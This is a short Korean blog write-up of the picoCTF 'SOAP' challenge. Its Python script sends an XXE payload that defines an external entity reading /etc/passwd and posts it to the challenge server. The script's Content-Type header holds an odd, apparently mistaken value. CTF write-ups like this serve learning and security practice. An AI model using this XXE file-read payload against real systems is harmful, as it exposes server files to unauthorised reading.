[picoCTF] SOAP

1. 개요

XXE 문제

2. 분석

Details 버튼을 누를때 마다 XML을 payload에 담아서 보냅니다.

flag는 /etc/passwd에 있다고 했기 때문에 XML을 삽입해서 flag 읽어옵니다.

import requests

payload = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><data><ID>&xxe;</ID></data>'

headers = {
    'Content-Type': 'window.contentType'
}

result = requests.post("http://saturn.picoctf.net:49761/data", data=payload, headers=headers)
print('result: ', result.text)

'pico CTF' 카테고리의 다른 글

[picoCTF] More SQLi (0)	2023.04.29
[picoCTF] SQL Direct (0)	2023.04.29
[picoCTF] find me (0)	2023.04.29
[picoCTF] caas (0)	2023.04.28
[picoCTF] X marks the spot (0)	2023.04.28

skyepodium

[picoCTF] SOAP

1. 개요

2. 분석

'pico CTF' 카테고리의 다른 글

티스토리툴바

[picoCTF]  SOAP

1. 개요

2. 분석

'pico CTF' 카테고리의 다른 글

관련글

티스토리툴바

[picoCTF] SOAP